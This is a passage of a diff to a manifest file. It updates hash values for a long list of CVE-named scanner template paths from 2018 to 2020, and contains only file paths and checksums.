http/cves/2018/CVE-2018-19439.yaml:8cf9de1027bb950b584a95f32ab3afe63e39b539 http/cves/2018/CVE-2018-19458.yaml:e4e04e3bbe327a7cc05199cb55dae47ebd623e46 -http/cves/2018/CVE-2018-19749.yaml:b80a4eef3fe0a1206023d8d0dc8b26cee5ac6d5b -http/cves/2018/CVE-2018-19751.yaml:8d27864bf4caf2876a106988807d7dc1cb107733 -http/cves/2018/CVE-2018-19752.yaml:57113db58eb4cecb68ae50e54abd72ca099d640d +http/cves/2018/CVE-2018-19749.yaml:ab6f950396175eaf28048b6198464b61dd64cc14 +http/cves/2018/CVE-2018-19751.yaml:21b3ca405fb20e20f10dfda150c3f38d37eeb9c8 +http/cves/2018/CVE-2018-19752.yaml:7c40da05c37bc3ebf08d031b29b2273dd67c4010 http/cves/2018/CVE-2018-19753.yaml:4fd11cfaa3bf2554e434b62f2a96e9545e01e803 -http/cves/2018/CVE-2018-19877.yaml:4375cb2f49064cf5d993be17ef2c3373dd4b8eda -http/cves/2018/CVE-2018-19892.yaml:d493b4d64830518d64f0b85e97175d0b800fea44 -http/cves/2018/CVE-2018-19914.yaml:bbe8568e914123eb4b29c180f58098a2fa796971 -http/cves/2018/CVE-2018-19915.yaml:bfe7f8b030a67058aa2ced76c8ebee8c6c26b672 -http/cves/2018/CVE-2018-20009.yaml:7a505961228ef29cb7e32d9756440385b9a04066 -http/cves/2018/CVE-2018-20010.yaml:b1ac2b035535f2205a688e0641ae4c7b4947e52f -http/cves/2018/CVE-2018-20011.yaml:68ce560d22433bb8e752378dac95100be7f1b577 +http/cves/2018/CVE-2018-19877.yaml:0dd094bf6c16c7a4dc7c8d1fdf01c10f000fe7b6 +http/cves/2018/CVE-2018-19892.yaml:4e322c56140d7259e545e8c3000dbae34774a53d +http/cves/2018/CVE-2018-19914.yaml:7a2aa9fe0a50a94afd399591f4cacf6c9c44fe25 +http/cves/2018/CVE-2018-19915.yaml:dc2630e4405c8f4b14b69f1787227de4e7bbd745 +http/cves/2018/CVE-2018-20009.yaml:299bde94a1390738b4d99b40f176478c05f34491 +http/cves/2018/CVE-2018-20010.yaml:2d9f2499a3510702a98c357e04100ca7152b5e52 +http/cves/2018/CVE-2018-20011.yaml:c7c1e243e2adccf5d4e2f2743f40c8466f37a55a http/cves/2018/CVE-2018-20462.yaml:4ac4ea366a333ff4b7862a2f52bc3d8b9328911a -http/cves/2018/CVE-2018-20463.yaml:60c74b4d6e4aa0275ab78a2b4bd3135e43764418 +http/cves/2018/CVE-2018-20463.yaml:ccc5b4e0e2750b5c21f922b928d39617b3c04b73 http/cves/2018/CVE-2018-20470.yaml:a6bd3317cb74e44ed88b9ec6699a881b69330d28 -http/cves/2018/CVE-2018-20526.yaml:c2358f17655261def84fd76749e1d43724a616a4 +http/cves/2018/CVE-2018-20526.yaml:2f9df225281bc02274727a22b3fa89eb8a4e2155 http/cves/2018/CVE-2018-20824.yaml:801edada9c936ce1a2f23f4164b6a799fd844045 http/cves/2018/CVE-2018-20985.yaml:404fe656d819cdedc50f379519ef8d7d46eb2b55 http/cves/2018/CVE-2018-2392.yaml:80321493599e71cb1d8b208a4f2fa11038bdad7c @@ -983,21 +1021,22 @@ http/cves/2019/CVE-2019-0221.yaml:52231abf5c354c514e4437d16742e9c34774ac80 http/cves/2019/CVE-2019-0230.yaml:32f6439ea77f429c1295bef55dfddd7df7b3f4af http/cves/2019/CVE-2019-10068.yaml:8111c317a4cde84dd68047f75ca1054ec023ba1d http/cves/2019/CVE-2019-10092.yaml:f9bc78326438d4ba09c78bfe5444e442c8ade609 +http/cves/2019/CVE-2019-10098.yaml:9dfa744a467172468ab770ba9c2d3fb8d9624573 http/cves/2019/CVE-2019-1010287.yaml:be7ab1f88827db40d3a810aeb3ba78692d6bb299 http/cves/2019/CVE-2019-1010290.yaml:6993819ff690d5b46f722b328e384ed3bf513d54 http/cves/2019/CVE-2019-10232.yaml:18bce5c3906b8c4f1b6796ee301af4a46e939af6 http/cves/2019/CVE-2019-10405.yaml:cb525d2675fe7ac36b747315f445f6b09f07a725 http/cves/2019/CVE-2019-10475.yaml:c48ab271e5242c2d8b0e4c67dfe3ececadd14c52 -http/cves/2019/CVE-2019-10692.yaml:f89e7d37d4f42538e0c99c8c01143f8484c5c6a3 -http/cves/2019/CVE-2019-10717.yaml:8be549f409ac36de55c3d9fb56c708e35a580c8c +http/cves/2019/CVE-2019-10692.yaml:83fd9dab568a489bfdf22b53e1caa00ac6a3329f +http/cves/2019/CVE-2019-10717.yaml:c0cd2e6386acead19cdf4b142aee5d531e12ac7a http/cves/2019/CVE-2019-10758.yaml:d6b1529af766fe0f131aa2b7c2c1a961e0a979e2 http/cves/2019/CVE-2019-11013.yaml:78c1e74f704ebea8d8f2aaea6ed119d741491703 http/cves/2019/CVE-2019-11248.yaml:c63e8ba351ba3fd4b22abc750a8712a1263333a6 -http/cves/2019/CVE-2019-11370.yaml:0e5e0fdb331e172bff6f5e3c36d1b1d012cd379b +http/cves/2019/CVE-2019-11370.yaml:632ff4a00526d5726b11cfd2a429240e23829681 http/cves/2019/CVE-2019-11510.yaml:2857fa498c463dbf19cb0dcdf1954f8a15f990b2 http/cves/2019/CVE-2019-11580.yaml:034e962ada5fa6ce72824ac8e740a61fe27493ed http/cves/2019/CVE-2019-11581.yaml:bbdabde144e09e621aa550ae8e49fa6965d44e40 -http/cves/2019/CVE-2019-11869.yaml:431566b754bfd62c6f290c5e63b7a8338c1858b8 +http/cves/2019/CVE-2019-11869.yaml:06e0024eb55626b19a680365652e44e8b620658a http/cves/2019/CVE-2019-12276.yaml:339e4547c2fa01b67abfeaaa60b10407eef9a2cf http/cves/2019/CVE-2019-12314.yaml:ccf4dc04650deefb66eb7e9f20347fe3fdc1dce1 http/cves/2019/CVE-2019-12461.yaml:725b55559f8ef676a5a332570430d155bee1f09d @@ -1006,12 +1045,12 @@ http/cves/2019/CVE-2019-12583.yaml:313a0dc94f1bd80af702ab4a02df08357b690a41 http/cves/2019/CVE-2019-12593.yaml:5d0d454bfe9336efd65b1dc9ecc4b6d7333666bf http/cves/2019/CVE-2019-12616.yaml:2cc5b0a3bb47d4a750249c3578b81192fcbd320e http/cves/2019/CVE-2019-12725.yaml:08547b6460f79bfec7130bf6304b2c430dd9b9dd -http/cves/2019/CVE-2019-12962.yaml:ac918ec21b52192fffdb87102dd4b7cac562253c +http/cves/2019/CVE-2019-12962.yaml:feaf1695b400ec83b70bddf95ac4f8c9f26e7314 http/cves/2019/CVE-2019-12985.yaml:c7d6e7033aa6aa8de171dfa5a3a691e53cd46be6 http/cves/2019/CVE-2019-12986.yaml:f9e68594f8fe3bb6132a6ccd8c31b6e60401da6c http/cves/2019/CVE-2019-12987.yaml:1b019db066b3891bf5d813da1e985b139ca3cbb0 http/cves/2019/CVE-2019-12988.yaml:b137d4650981e0dbb15c3aad8aa2d88088d5bed7 -http/cves/2019/CVE-2019-12990.yaml:8ffb6453c4c6452de45e794727814343fbebcebb +http/cves/2019/CVE-2019-12990.yaml:323f21ab09826b61f8a522980bbe6885102427f0 http/cves/2019/CVE-2019-13101.yaml:5b75b80f3646b97555d4bb3a7d6757ba21359e22 http/cves/2019/CVE-2019-13392.yaml:f53af0a85f2dc41779609f498137796e2c3327e4 http/cves/2019/CVE-2019-13396.yaml:b67ec7f172a50aaf032d8823661059298cd06619 @@ -1022,14 +1061,14 @@ http/cves/2019/CVE-2019-14251.yaml:89b201cad2d15501868495372d86588fd0c43108 http/cves/2019/CVE-2019-14312.yaml:29230ee82e33dba91c3774b122bc35090a37f705 http/cves/2019/CVE-2019-14322.yaml:0a9bd7af565eebc40f742b33abd5fa5c10f50813 http/cves/2019/CVE-2019-14470.yaml:e503b60f894f62b5ce60b3483a4a618cb36de336 -http/cves/2019/CVE-2019-14530.yaml:4d61eed998118ca1d4093060b58c1a75acbceaec +http/cves/2019/CVE-2019-14530.yaml:0daf3e8c25b0094c0b9225f3acdb8618f3ed91c7 http/cves/2019/CVE-2019-14696.yaml:9331ce4c80a481037df44a995fb148f68fbdad85 http/cves/2019/CVE-2019-14974.yaml:e10b505b004e0d46806d73f345cfb55f5b43489e -http/cves/2019/CVE-2019-15043.yaml:93447e224995e99e971319d532d28b132f1c0abe +http/cves/2019/CVE-2019-15043.yaml:176d1a8d6a9a86cd03446c84b59958583ee9de65 http/cves/2019/CVE-2019-15107.yaml:56d1331c80982df80e1cc0324f0b59b8a49d3b31 -http/cves/2019/CVE-2019-15501.yaml:4318eb692d40385188fc2e9feab65488848aca17 +http/cves/2019/CVE-2019-15501.yaml:84d3bfc749f96329416be4677682d507d39b9ffc http/cves/2019/CVE-2019-15713.yaml:cb88a6a5ec3947df213dd8ec6f1ec03886e20b0d -http/cves/2019/CVE-2019-15811.yaml:94c2bcef63378afa37f7bcce70bbbd05616959f9 +http/cves/2019/CVE-2019-15811.yaml:a09aa4bab65c5e113d40aa6920bca9dcc8d503bf http/cves/2019/CVE-2019-15858.yaml:00f0f1d1dbfdca7d674573b3612cd955b79baad1 http/cves/2019/CVE-2019-15859.yaml:dc38ce4092fc89f5489a3057e8b11e60ff4187da http/cves/2019/CVE-2019-15889.yaml:5ff95ae0da371683c29132376020d3b30d6a1206 @@ -1041,9 +1080,9 @@ http/cves/2019/CVE-2019-16332.yaml:7fb065cf4dcf7030b1d79a4702f316f9ab93bdf7 http/cves/2019/CVE-2019-16525.yaml:6813795e28e256e9680a6221ca475c3bc998d142 http/cves/2019/CVE-2019-1653.yaml:fc2d63eaa81199c56d1bfe44fb188396601377d7 http/cves/2019/CVE-2019-16662.yaml:22c9daa0d759a62387b7ce5bdb3ea7bfa21e7480 -http/cves/2019/CVE-2019-16759.yaml:2fb5ac270b7f017c73a925a2d49012196610f3c6 +http/cves/2019/CVE-2019-16759.yaml:6d00e12504de9e9d2c52b15a2cdded08ce17db5e http/cves/2019/CVE-2019-16920.yaml:d0a4840c64690182958e2e23a58b242b13d52cd7 -http/cves/2019/CVE-2019-16931.yaml:7196b04090116e6b203452687b25c91611f49ba0 +http/cves/2019/CVE-2019-16931.yaml:d6ae353fececd87fe37de3aa12a0a24a0700c55e http/cves/2019/CVE-2019-16932.yaml:3754e3902a4891265a3ff5eef7df5468b95c7ea8 http/cves/2019/CVE-2019-16996.yaml:b52fbe7050b0a423cd6f40b6507ecac0e5ebd304 http/cves/2019/CVE-2019-16997.yaml:f60651f43c8b12dad6a52968a5aa8a6bc9954de7 @@ -1058,23 +1097,24 @@ http/cves/2019/CVE-2019-17558.yaml:43ece44d0ddef0f1e14c1ce7c1a117e16550630c http/cves/2019/CVE-2019-1821.yaml:00412f80275ba61337dc271cb0e6b11cb6f75e0d http/cves/2019/CVE-2019-18371.yaml:c6e712f891f088b5d878b20c4e7ae5677d3d0178 http/cves/2019/CVE-2019-18393.yaml:58b15f2790fda79399d1fddde5edfd2bb8f14aef -http/cves/2019/CVE-2019-18394.yaml:340b952533444777ce730071029412290a9c68d7 +http/cves/2019/CVE-2019-18394.yaml:0db49640c872cc37a310346e939081d38e8fdbb1 http/cves/2019/CVE-2019-18665.yaml:ae85da679fc489308e12c8096b91134df53a6899 http/cves/2019/CVE-2019-18818.yaml:40d270b5ca6642318cb88e74af29e7d60c014d33 http/cves/2019/CVE-2019-18922.yaml:b410bf697f2df549b0e8ed3b557e402570958635 http/cves/2019/CVE-2019-18957.yaml:9adc562245de4dc44a4bdad27bbcb69c41a34b37 http/cves/2019/CVE-2019-19134.yaml:5e4bd17eff1b1080314391ac70f752ba55a6025e http/cves/2019/CVE-2019-19368.yaml:4cf6ef5557d4cdcbb0a9fd377e2d712570a11b4b +http/cves/2019/CVE-2019-1943.yaml:9088968d9cc90b8d84fab3fec4b18d2341e73ace http/cves/2019/CVE-2019-19781.yaml:9df9f5e3a2c75a78705cae885c44bbe6f670474a http/cves/2019/CVE-2019-19824.yaml:7c702ac5a64bd8dcb03a113448dcaa7f618a5c13 http/cves/2019/CVE-2019-19908.yaml:c69a7b5741e52b4e1f2667a3215b3662c75b5586 http/cves/2019/CVE-2019-19985.yaml:90a7dfb504c42d5a3af24a57af307952a13a69ec http/cves/2019/CVE-2019-20085.yaml:320e46678e51c05267cf366fc63da0120da386e7 http/cves/2019/CVE-2019-20141.yaml:61bfbc244a6afc5c9d6bab80d73ff96694b9e940 -http/cves/2019/CVE-2019-20183.yaml:5a17266b3785c48ca8bbaaee067e74b6d0289096 +http/cves/2019/CVE-2019-20183.yaml:740cea4d2f6a22dafebe29ee025a05f6919c2830 http/cves/2019/CVE-2019-20210.yaml:697e8f8cb9de9c960156fae1ea1717b48b279d2f http/cves/2019/CVE-2019-20224.yaml:97bfa0f15696fdec116a19a3595a4430375ef3cb -http/cves/2019/CVE-2019-20933.yaml:0536357d8d1cc4198fdfd227a9b4df1dc1e5bd29 +http/cves/2019/CVE-2019-20933.yaml:35576557d9ab134ade3a918715ff810a5b985d4c http/cves/2019/CVE-2019-2578.yaml:6ce81dcf51e041a07169c7f30fc1029df4445804 http/cves/2019/CVE-2019-2579.yaml:eb08745002385ec2e0d196620deca526eb8680ad http/cves/2019/CVE-2019-2588.yaml:7e42433802dccde2b47174db3ed81fc6b8a8ab0c @@ -1083,27 +1123,27 @@ http/cves/2019/CVE-2019-2725.yaml:ed427cb00780071fbb29dde142c5cfdc62e725e8 http/cves/2019/CVE-2019-2729.yaml:fa6bcc04be43c0d7a4ad6775771b68ce853e4895 http/cves/2019/CVE-2019-2767.yaml:c5a3a2db82ab52398aaa2ca5d5760e5a2b4ea2b3 http/cves/2019/CVE-2019-3396.yaml:f0182df6989565302721c5261da7716648f661a7 -http/cves/2019/CVE-2019-3398.yaml:0205b54ef9ae551804c0c0000698526801158406 +http/cves/2019/CVE-2019-3398.yaml:442e05f4c1b26785156f7c241facc790c3314a50 http/cves/2019/CVE-2019-3401.yaml:159e749412e172e98f3692203880122f9c7b4cf6 http/cves/2019/CVE-2019-3402.yaml:1730d28e491c9f44cc76434b58a8aa686ed6977a -http/cves/2019/CVE-2019-3403.yaml:17ef28b71019cde44130a76c6f8f1b24ab5b2e3f +http/cves/2019/CVE-2019-3403.yaml:e640a15078f20fe9893353da38d6b824bbc1bc2d http/cves/2019/CVE-2019-3799.yaml:8646d1b26c783c09359ef4f5bcee5c1669a31881 http/cves/2019/CVE-2019-3911.yaml:5e613749d94f142ff4010f68951547a6eef1a349 http/cves/2019/CVE-2019-3912.yaml:197e08afb0bf5d56d82bb233d206f05a51b243d0 http/cves/2019/CVE-2019-3929.yaml:1d5102ef6d79e6554cf5af97895f23997fc1329e http/cves/2019/CVE-2019-5127.yaml:53f57db6b4469242167505c2bd074948e5666a85 http/cves/2019/CVE-2019-5418.yaml:47fbb4091b9a548b4f85f7bbd664dca2d67c6dff -http/cves/2019/CVE-2019-5434.yaml:ddad29f69dd5eacc9ca81508676e20db7a569822 +http/cves/2019/CVE-2019-5434.yaml:e83c4a2f5cc0df64db1a0f03ecf4c3e8b82a7510 http/cves/2019/CVE-2019-6112.yaml:f654472fcc9ebdb7f2c4cc71dd12a75f7e2b1669 http/cves/2019/CVE-2019-6340.yaml:0bae4434b6a4879fc629e09083b15803e28e6409 http/cves/2019/CVE-2019-6715.yaml:9f85209ae6ae3408dd5cf47434d2189146c828f5 -http/cves/2019/CVE-2019-6799.yaml:f2686ad06d58ae3d3a711a9966a598c749e342a1 -http/cves/2019/CVE-2019-6802.yaml:9c04004779985dde137c16a67a479867b1c7acd3 +http/cves/2019/CVE-2019-6799.yaml:64aa4e04828cc962d674cd41d0750e1917fce21a +http/cves/2019/CVE-2019-6802.yaml:0566f258e19351febfe8765f8ef99453e8f69456 http/cves/2019/CVE-2019-7219.yaml:469562e696051f22ae2b09a8112be26efe288fad http/cves/2019/CVE-2019-7238.yaml:ff9d5b04c6e2aef0a10ecdf8425296500b042b45 http/cves/2019/CVE-2019-7254.yaml:b9310fa6aba91031c5db6ad9638c7ba23888ddce -http/cves/2019/CVE-2019-7255.yaml:209d049b61a0113647405bb9989e624fc927d1c3 -http/cves/2019/CVE-2019-7256.yaml:52b3674d497dfa57e859a8836cb619b0a874e53d +http/cves/2019/CVE-2019-7255.yaml:e58644bd683d1dbc2a4bdf12dd8fe7dc35ae7a3f +http/cves/2019/CVE-2019-7256.yaml:0ed4ea7d00f6575010812eb703a1232dd2146645 http/cves/2019/CVE-2019-7275.yaml:8fc4c60569df00f15a1d18a294e4b8735a29a4c8 http/cves/2019/CVE-2019-7315.yaml:01c958984d80e5b4ff9e09dec9016eb2550095de http/cves/2019/CVE-2019-7481.yaml:f4544595557126e843a6ba0108d7150250bb43fe @@ -1115,14 +1155,14 @@ http/cves/2019/CVE-2019-8446.yaml:a9fc78750e0ab7ff75eef71e2c602796163fc55c http/cves/2019/CVE-2019-8449.yaml:398dea3d2f474ce51c1ae3f5b292565635d007a6 http/cves/2019/CVE-2019-8451.yaml:0e7651d96b7aecc252fcae89760700478e82712d http/cves/2019/CVE-2019-8903.yaml:b94209da75b2a4887f835dbe04bc7f4e25fcb1dc -http/cves/2019/CVE-2019-8937.yaml:6e7eea5dd6c6264119679f03669116acfc79bec8 +http/cves/2019/CVE-2019-8937.yaml:a55b3b870c18450b965a118f578f9871c16d13c3 http/cves/2019/CVE-2019-8982.yaml:68af35de6c39a25023315e75164455102fd72042 http/cves/2019/CVE-2019-9041.yaml:3595d00cc90226ba2dfd29ec70a35e9a17a63254 http/cves/2019/CVE-2019-9618.yaml:ea31141c7c4ce329ecccf48ce66dd64b262b7830 http/cves/2019/CVE-2019-9670.yaml:a8b54e97cfb8c57ed82c968bbe22bf4985c95b84 http/cves/2019/CVE-2019-9726.yaml:0dc5e9d3d2e02d0452ba479d62051faddcecddeb http/cves/2019/CVE-2019-9733.yaml:6d9a970d26d91d5bb04b20a5162094d979e80a37 -http/cves/2019/CVE-2019-9915.yaml:d632d4c273e5a0438d00a96292e0cb50a14104f5 +http/cves/2019/CVE-2019-9915.yaml:12c0391466ebd091f2a0e0ee75dea17e3bed7933 http/cves/2019/CVE-2019-9922.yaml:bfb994682be31292df432fc2760a90e106741a8f http/cves/2019/CVE-2019-9955.yaml:ad5b68e1570cf6a08c449fcdca9438c24fdeaa83 http/cves/2019/CVE-2019-9978.yaml:bceadb471d131e94bc8de9703c9d528f67a8d6a4 @@ -1134,53 +1174,53 @@ http/cves/2020/CVE-2020-10547.yaml:2a23052ce827a40a110e508d9d249f4a99e3c8dd http/cves/2020/CVE-2020-10548.yaml:03333037b97ea0ec579583e13517135d82e45c63 http/cves/2020/CVE-2020-10549.yaml:4b6cf1f3425ce80b29441c6ac4a46f42afb9f898 http/cves/2020/CVE-2020-10770.yaml:7f54eaa97fc0f90d6f957e42feea299ee2a2e669 -http/cves/2020/CVE-2020-10973.yaml:ad25e9a506d6699e9622a50ed7244a76aa2ddda2 +http/cves/2020/CVE-2020-10973.yaml:031f367245ae5b6a4c7e6e550969c25e91443e1d http/cves/2020/CVE-2020-11034.yaml:bc2d4ac5c6a444311eb08789833014417eeea3d0 http/cves/2020/CVE-2020-11110.yaml:0a35f9fbea43aa35765014648936b19175d856eb http/cves/2020/CVE-2020-11450.yaml:5b6d4403b2fa4512544dd5c3ef82260ac1abfb97 http/cves/2020/CVE-2020-11455.yaml:0099d221cee52df34279cd07320c04948d3eac4f http/cves/2020/CVE-2020-11529.yaml:c205fee97734110b9354ceb341f3aadc09005c66 -http/cves/2020/CVE-2020-11530.yaml:6e3bac2d7f95dc9d0ecf0e8be90fbeccdd034f70 +http/cves/2020/CVE-2020-11530.yaml:e61bb2e9eef89eb27268feecb8849044f301dbb2 http/cves/2020/CVE-2020-11546.yaml:b5ac6955be9eae2cca418f2ad165a7d7e4bf9a4c -http/cves/2020/CVE-2020-11547.yaml:fa02856102c6ac3dd3f4cc5e2c3a4d2f01d8b3cc +http/cves/2020/CVE-2020-11547.yaml:8d8fec2ec0e1b0aa82f62ea990d44ffe963aaa44 http/cves/2020/CVE-2020-11710.yaml:49e83a2b6649a860b00eab20ef03df48615918ac http/cves/2020/CVE-2020-11738.yaml:1a8d9fb75fc3a13ac87e8576b3397bd77fd4f4d5 http/cves/2020/CVE-2020-11853.yaml:7ce0eef0e5846bbaa53fa270ccab17afbd894374 http/cves/2020/CVE-2020-11854.yaml:a2759dc5a7a0e6f1f8e11fe9eb0ae740cfd2630c http/cves/2020/CVE-2020-11930.yaml:fcc579e35258e992349183c3f34ed07319dc7f69 -http/cves/2020/CVE-2020-11978.yaml:442379a036c79223802997f4166816ca410919da +http/cves/2020/CVE-2020-11978.yaml:9992f5347362e46184f28ae12163d4ec18a7f2e5 http/cves/2020/CVE-2020-11991.yaml:9995f4fc8f0e9462de1fa75e56b0d692ab1de31c http/cves/2020/CVE-2020-12054.yaml:3b7646b2210eccb9bf3f96ca1c4f48f42ff8161b http/cves/2020/CVE-2020-12116.yaml:4cbca4c5dcc717753a41dd5aaf3f4e3b43a8b9e1 -http/cves/2020/CVE-2020-12127.yaml:05671de5480d2682932a14b8dff97609d02947ce +http/cves/2020/CVE-2020-12127.yaml:d16bc71ce59b802a28e83c1810a8979bd0512fd2 http/cves/2020/CVE-2020-12447.yaml:42ecd1f0d9ad96484113ae4f3d34ba0d08220c1b -http/cves/2020/CVE-2020-12478.yaml:dfd9e604a31933f7ce61dec40bfbd628eff640cb +http/cves/2020/CVE-2020-12478.yaml:76ab6cb03973e0ab0d9fa23b87642b392a0d4c88 http/cves/2020/CVE-2020-12720.yaml:3f80125f3fe60b1dc8c6d09785b8f1917c83a00e http/cves/2020/CVE-2020-12800.yaml:8426133e6dc7301fd5583dad4f1a4223da3bf37b -http/cves/2020/CVE-2020-13117.yaml:818828b43f61961f046fdd817c8d0ac17ea7fd7b +http/cves/2020/CVE-2020-13117.yaml:9bcae6edb8602a43f0878e254850d89f38c95ab8 http/cves/2020/CVE-2020-13121.yaml:f25caff58688b959396f4456b881bb576673ed16 http/cves/2020/CVE-2020-13158.yaml:5987e1af31299fc58254655a147450518c87b941 http/cves/2020/CVE-2020-13167.yaml:4a6b0f9f30cb520f5b76f54a44a230d01291b52d http/cves/2020/CVE-2020-13258.yaml:cfa0b4cbb8065ce44ff15d59c8537480b8669f32 -http/cves/2020/CVE-2020-13379.yaml:84ec057a617d087ae872026cc9febac3ce187522 -http/cves/2020/CVE-2020-13405.yaml:4b525c8229d6a76ec1de59c8fa585163c982c184 +http/cves/2020/CVE-2020-13379.yaml:7ec9f44f906859ea498b5876e85adef13cde8df2 +http/cves/2020/CVE-2020-13405.yaml:4a16f64a3f97ae8420acd7e5dc1eb0c4c909c061 http/cves/2020/CVE-2020-13483.yaml:98f6bd81f510114743a985c66e03d8ad535d7bc6 http/cves/2020/CVE-2020-13700.yaml:1a6d116d008436274a6b2ab747e582ead3dbcc83 -http/cves/2020/CVE-2020-13820.yaml:d2700d3216968488eb0c3ae6130341e56675d508 -http/cves/2020/CVE-2020-13927.yaml:d8e027f03a379f09c20ff540f73dc31fd31b143b +http/cves/2020/CVE-2020-13820.yaml:04dffa65726fa0ed870d75eb03517f41487ccc17 +http/cves/2020/CVE-2020-13927.yaml:0de285e84cfb9c52e605119dba59d024b508e75f http/cves/2020/CVE-2020-13937.yaml:44a4c9652e64918347d6a92d6849eba072c1b753 http/cves/2020/CVE-2020-13942.yaml:3c654518d71c898b5969c9cbba4b8d9944ad9113 http/cves/2020/CVE-2020-13945.yaml:1846383c22e82e085a4e0bb55521fcfe51c0c5ff http/cves/2020/CVE-2020-14092.yaml:a43d560ca2bdeb83527b1bcd1b1c6b24073247c1 -http/cves/2020/CVE-2020-14144.yaml:dfe6d12ff5430cffc6972ae199eebc38855c931a +http/cves/2020/CVE-2020-14144.yaml:43328a2df2df46e60ce98b45121a0cbd5f32e65c http/cves/2020/CVE-2020-14179.yaml:6447baa5616d27410380bae0b087a854161fa3b2 http/cves/2020/CVE-2020-14181.yaml:fea5cc18556a24983dac2a85861cc26f2cb79b23 -http/cves/2020/CVE-2020-14408.yaml:e8b0d842fcda9cf8b015be80b785e9f9562c3886 +http/cves/2020/CVE-2020-14408.yaml:4aab11a6e9bb21c796484c7bab08d9b74c4a3f51 http/cves/2020/CVE-2020-14413.yaml:95478446d73668ed451b18f2b1a1dd0987645660 -http/cves/2020/CVE-2020-14750.yaml:fe2938a33c22d7d595018399b9f2dbe4f9ed4c2a +http/cves/2020/CVE-2020-14750.yaml:79cfec70399f14f026a0497f8fbe7801ab2d7e40 http/cves/2020/CVE-2020-14864.yaml:adf3ed7c68cf0b7ab957784a9c754d2e9de8d9f9 http/cves/2020/CVE-2020-14882.yaml:281478487ff4b2e11831868a4059a456d69fee57 -http/cves/2020/CVE-2020-14883.yaml:60bfb404e1e9323a67baab1ecae713660c9ead3d +http/cves/2020/CVE-2020-14883.yaml:f0b2c21b9db92cf96197a7b65489049faecee143 http/cves/2020/CVE-2020-15050.yaml:6a9b3f4edcbabef90fae353affc89671e5329428 http/cves/2020/CVE-2020-15129.yaml:3ab95e228c75073122f7f0e27542caad0c35919e http/cves/2020/CVE-2020-15148.yaml:cf48bb7b5757fe04674606000981a0ec28fc2693 @@ -1188,7 +1228,7 @@ http/cves/2020/CVE-2020-15227.yaml:8e6a12a255a175d6445040aa07bdb1a35784a427 http/cves/2020/CVE-2020-15500.yaml:bcc3d5215e817c4c99ba3347dc17dd63dd0ff417 http/cves/2020/CVE-2020-15505.yaml:637134bf53d3007ca1b841a4f70f3e4b616b8082 http/cves/2020/CVE-2020-15568.yaml:55c1fa927a9621309596eb851d307bebf06c9ba0 -http/cves/2020/CVE-2020-15867.yaml:8e9f1cb212c839519faa9da8a2760f039f14e8e7 +http/cves/2020/CVE-2020-15867.yaml:5224bb083c579f2f9a723ed69c896e8663c69338 http/cves/2020/CVE-2020-15895.yaml:0d017a8d86eb3966b0edf40362e4df9f5c1710eb http/cves/2020/CVE-2020-15920.yaml:a9698c87cf8d0fd8c3abb1abe3b4965cbf79e46e http/cves/2020/CVE-2020-16139.yaml:dab85e59487f8569d492411050321a7b054820e9 @@ -1202,7 +1242,7 @@ http/cves/2020/CVE-2020-17505.yaml:4248a4f9ccc30e15e883e1c077db31ae03f02c67 http/cves/2020/CVE-2020-17506.yaml:f6367d706f86772befa64be784b37509980b5545 http/cves/2020/CVE-2020-17518.yaml:7bd646393c73608e9db970ac92198b31cdcc37c0 http/cves/2020/CVE-2020-17519.yaml:6bc006f55091e4d997565baa24d981da7aa71830 -http/cves/2020/CVE-2020-17526.yaml:f6f8b238d537cd29192174a29bae976343acb855 +http/cves/2020/CVE-2020-17526.yaml:c5e506b85a10a62fd006fe40fa8cd4fb0609645a http/cves/2020/CVE-2020-17530.yaml:1919f143f2cda18c25291b369a8fe0a69dd58a00 http/cves/2020/CVE-2020-18268.yaml:1cf8b66327d21f4863cd72fc65fba8c8d7ccb18f http/cves/2020/CVE-2020-19282.yaml:56547968333d58ce186cbba53e45e0612eacd6fe @@ -1210,15 +1250,15 @@ http/cves/2020/CVE-2020-19283.yaml:91f8003c70f19ac40a5acac6bbc90f12da3957ad http/cves/2020/CVE-2020-19295.yaml:9f151563a1ef88830dc986ea3b6ddbf3b71745d0 http/cves/2020/CVE-2020-19360.yaml:d932ffbeec184402dd78c0dbf8bea7b1383e1b5d http/cves/2020/CVE-2020-1943.yaml:3b7bbd34383606c5508656a3468851cdadc7131e -http/cves/2020/CVE-2020-1956.yaml:02c5a062b7c29523c8d047ad4f721b5655693a69 +http/cves/2020/CVE-2020-1956.yaml:2375aa3be74c5b636fd0eb664274d0276582e695 http/cves/2020/CVE-2020-19625.yaml:3e3bbf77b8fa2ac8d655431e5449fee42100a0db -http/cves/2020/CVE-2020-20285.yaml:41a9df28a93625263b2e6752a481e0b2c625b2dd -http/cves/2020/CVE-2020-20300.yaml:a7dc0ec3d559e26de5e612306634bade2e636c39 +http/cves/2020/CVE-2020-20285.yaml:151a9399bca0eeb752e212c9968c55fcaad7e8b0 +http/cves/2020/CVE-2020-20300.yaml:42c4ad0589282e003487dad4925c543b0c772a53 http/cves/2020/CVE-2020-2036.yaml:7cced7e4da33bcf839509e4f595ed4c028c82e70 http/cves/2020/CVE-2020-2096.yaml:ac59b4b0b4a7b603581b2753c4038a0af9a9dbba -http/cves/2020/CVE-2020-20982.yaml:d08d0d07cf73e215c0a62d289f92ceb9533ae297 -http/cves/2020/CVE-2020-20988.yaml:1b1b251bb92e31153c549ca4caf77dfa9a947ef8 -http/cves/2020/CVE-2020-21012.yaml:f4bcea89fe148673b403bdeb4ee10dd4a14e1b7d +http/cves/2020/CVE-2020-20982.yaml:979fa75de3fbae01409fc0fe4fab8bdde44365cb +http/cves/2020/CVE-2020-20988.yaml:568467e165a25d086cb57c581d0eece0bcb0fd39 +http/cves/2020/CVE-2020-21012.yaml:daa561c8d57b2b8be7627f346621e0094c7fb0b6 http/cves/2020/CVE-2020-2103.yaml:7ceb1faccec7773548ca93f4699c78114544b8ef http/cves/2020/CVE-2020-21224.yaml:3f80c44283b6819a91f92b2a512e4452c3f60994 http/cves/2020/CVE-2020-2140.yaml:55a81b30d3209df8c5b1e1d1a00d3c7d70f68d99 @@ -1228,9 +1268,9 @@ http/cves/2020/CVE-2020-22210.yaml:45b05e6a0ee0b5a28e461ba5d72d351a398ddc9f http/cves/2020/CVE-2020-22211.yaml:044e06aa9d2d6bbf9f4ad0bb34dfd866fddbe591 http/cves/2020/CVE-2020-22840.yaml:0d8588d065ea691e1041863339474ace6b2d4e24 http/cves/2020/CVE-2020-23015.yaml:0915eb50c842445a938ac56aab384323950f833b -http/cves/2020/CVE-2020-23517.yaml:d6b421457f4449fbe1b7bac470ce23ccb3b7cf5c 